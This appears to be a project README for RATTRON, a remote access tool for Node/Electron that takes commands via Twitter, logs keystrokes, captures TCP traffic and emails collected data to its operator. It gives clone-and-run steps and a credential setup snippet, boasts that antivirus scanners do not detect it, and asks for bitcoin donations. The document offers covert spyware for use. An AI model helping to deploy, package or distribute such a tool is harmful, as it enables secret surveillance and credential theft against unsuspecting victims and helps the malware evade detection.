RATTRON is a simple example of remote access tool that use twitter as command server. Including keylogger and tcp packets handler.
git clone https://github.com/bychok300/rattron
cd rattron
npm install
//open main.js file
//it contains rat functionality
//pass your keys to get twitter access
let client = new Twitter({
consumer_key: 'YOUR_KEY',
consumer_secret: 'YOUR_KEY',
access_token_key: 'YOUR_KEY',
access_token_secret: 'YOUR_KEY'
});
After you need pass email credentials in sendMailToOwner
function.
Finally you can run app using
npm start
for executed file for all platforms see electron packager
rattron/Utils/loggerNtcpHandler.js
contains all function to handle tcp traffic and key press events.
If you want use it just copy this code and replace code in main.js
this is it :^) Virus total test doesn't recognize any malware or trojan or somthing bad. It tool fully unvisible for antivirus feel free to ask your quiestions, contribute to project and do whatever you want)
if you like this app you may donate me. bitcoin: 17jJDW8z9KVsueY4P7g33jrJhZbD9GxsBY